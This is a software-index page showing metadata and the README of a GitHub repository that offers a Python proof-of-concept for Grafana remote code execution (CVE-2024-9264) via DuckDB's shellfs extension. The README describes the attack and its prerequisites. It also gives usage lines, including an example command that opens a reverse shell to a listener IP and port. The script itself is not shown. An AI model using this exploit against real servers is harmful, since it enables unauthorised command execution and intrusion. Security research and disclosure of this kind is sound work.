Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/z3k0sec/cve-2024-9264-rce-exploit
Grafana RCE exploit (CVE-2024-9264)
https://github.com/z3k0sec/cve-2024-9264-rce-exploit
cve-2024-9264 duckdb exploit grafana rce shellfs
Last synced: 3 months ago
JSON representation
Grafana RCE exploit (CVE-2024-9264)
- Host: GitHub
- URL: https://github.com/z3k0sec/cve-2024-9264-rce-exploit
- Owner: z3k0sec
- Created: 2024-10-21T03:36:05.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2024-10-21T22:31:47.000Z (4 months ago)
- Last Synced: 2024-10-27T03:03:29.722Z (3 months ago)
- Topics: cve-2024-9264, duckdb, exploit, grafana, rce, shellfs
- Language: Python
- Homepage: https://zekosec.com/blog/rce-grafana-cve-2024-9264/
- Size: 7.81 KB
- Stars: 8
- Watchers: 1
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2024-9264-RCE-Exploit in Grafana via SQL Expressions
## Description
Proof Of Concept for Remote Code Execution in Grafana (CVE-2024-9264)This repository contains a Python script that exploits a Remote Code Execution (RCE) vulnerability in Grafana's SQL Expressions feature.
By leveraging insufficient input sanitization, this exploit allows an attacker to execute arbitrary shell commands on the server.
This is made possible through the shellfs community extension, which can be installed and loaded by an attacker to facilitate command execution.## Prerequisites
- authenticated Grafana user with `Viewer` permissions or higher
- DuckDB binary must be installed and accessible through Grafana's PATH## Impacted version
Grafana >= v11.0.0 (all v11.x.y are impacted)## Usage
```
python3 poc.py [--url ] [--username ] [--password ] [--reverse-ip ] [--reverse-port ]
```
![14](https://github.com/user-attachments/assets/f62d946d-0195-45db-b28e-0cdb6c94985c)## Example
```
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
```## Disclaimer
This script is intended for educational purposes and for use in controlled environments where you have permission to test the security of the system. Misuse of this tool could lead to legal consequences.
## More
https://zekosec.com/blog/file-read-grafana-cve-2024-9264/https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/